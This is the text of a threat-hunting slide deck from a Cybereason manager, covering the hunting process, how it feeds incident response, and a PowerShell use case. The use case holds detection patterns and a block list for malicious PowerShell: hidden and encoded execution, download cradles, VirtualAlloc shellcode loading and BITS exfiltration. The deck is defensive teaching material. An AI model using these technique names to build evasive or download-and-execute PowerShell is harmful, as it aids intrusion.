Hunting 102Beyond the Basics

#whoami

Brad MechaHunting Team Manager at Cybereason

Former Technology Consultant / Cyber Defense at RSA Former CIRT Lead at a Global Advanced Manufacturing Organization

Why we’re here today

Quick Hunting Refresher

I’m Hunting!! Now What?

Giving Back & Process Integration

Expanded PowerShell Use Case

The process of proactivelydiscovering undesirable activity to illicit a positive outcome.

Refresher: Hunting defined.

Refresher: Why?

Prepare? Its very hard to defend what you can’t see and don’t understand.

Be proactive? Don’t wait for bad to happen? Then have to react to fix.

Fix stuff? Especially before it breaks!

Adapt or Perish. Learning is discovery, the discovery of the cause of our ignorance. However, the best way of learning is not the computation of information. Learning is discovering, uncovering what is there in us. When we discover, we are uncovering our own ability, our own eyes, in order to find our potential, to see what is going on, to discover how we can enlarge our lives, to find means at our disposal that will let us cope with a difficult situation.

--Bruce Lee

The Hunting Process

Motivation + Hypothesis

DataCollection

Tooling / Analysis Outcomes

Automation*

I’m Hunting! Now What? We’re Giving Back!

Incidents

Detection Improvements / New Collection Techniques

Prevention w/ Confidence

Config Management / Compliance / Audit

Improve Response / Triage

Incident Response Process

Prepare

Detect

RespondContain / Eradicate

Post-Mortem / Prevent

Motivation + Hypothesis

DataCollection

Tooling / Analysis Outcomes

Automation*

Prepare

Detect

RespondContain / Eradicate

Post-Mortem / Prevent

Hunting Process Incident Response Process

Escalated Incident

High Fidelity Detections

Use blind spots / Gaps as sources of Motivation and Hypothesis/

New Data Collection and Analysis TechniquesImprove Triage and Response SOPs

Hunting: A Deeper Dive

Previous Outcomes create new Motivation + Hypothesis’

Introducing new datasets to expand previous outcomes

Data stacking becomes more crucial to the journey to analysis / data science

Expanded Hunting: Powershell

© 2015 Cybereason Inc. All rights reserved.

Powershell

Service = commandline:powershell or .ps*

FilelessTechniques

Process Execution

Network Comms

PersistenceRegistry

Services

Hidden

Obfuscated

Shellcode / DLL

Execution

Encoded

Download Commands

Parent / Child

Profiling

Int2ExtProfiling

DNS Queries

Registry = commandline:powershell or .ps*

commandLine:hidden|1|-nop|iex|-invoke|ICM|scriptblock,

commandLine:`|1|^|+|$|*|&|.

commandLine:nop|nonl|nol|bypass|e|enc|ec

commandLine: DownloadFile|IWR|Invoke-WebRequest|IRM|Invoke-RestMethod|DownloadString|BITS

commandLine:dllimport|virtualalloc

Parent: wscript|mshta|MSOffice|Browser|WMI*

Connections → Filter:isExternalConnection:true

URL: .ps*

DNS Query: TXT C2

DNS Query: Received vs Transmitted Ratios

Giving Back…Incident Escalation

Incident 1: Powershell WebClient –Downloading Stage 2 Payload

Incident 2: Remote .ps file execution / Invoking shellcode

Incident 3: Mismatched Services – Adversarial use of .ps

Incident 4: Data Exfil – Powershell BITSTransfer

Giving Back…PreventionBlock execution of PowerShell.exe on all systems where it’s not in use for administrative purposes

Force specific Parent/Child Process Relationships – MSOffice|Wscript|Mshta|Browsers|WMI spawning Powershell.exe

Anchor Powershell scripts to a specific server directories, block .ps* from running directly on a system

Use endpoint firewall to prevent powershell.exe from connecting to non-approved IPs

Block “Bypass” “Hidden” ”Download String” “WebClient” ”DLLImport” “VirtualAlloc” as a command line argument for execution by an unauthorized user

See #2 for allowing valid applications

brad@cybereason.com

@cybereason

Thank you!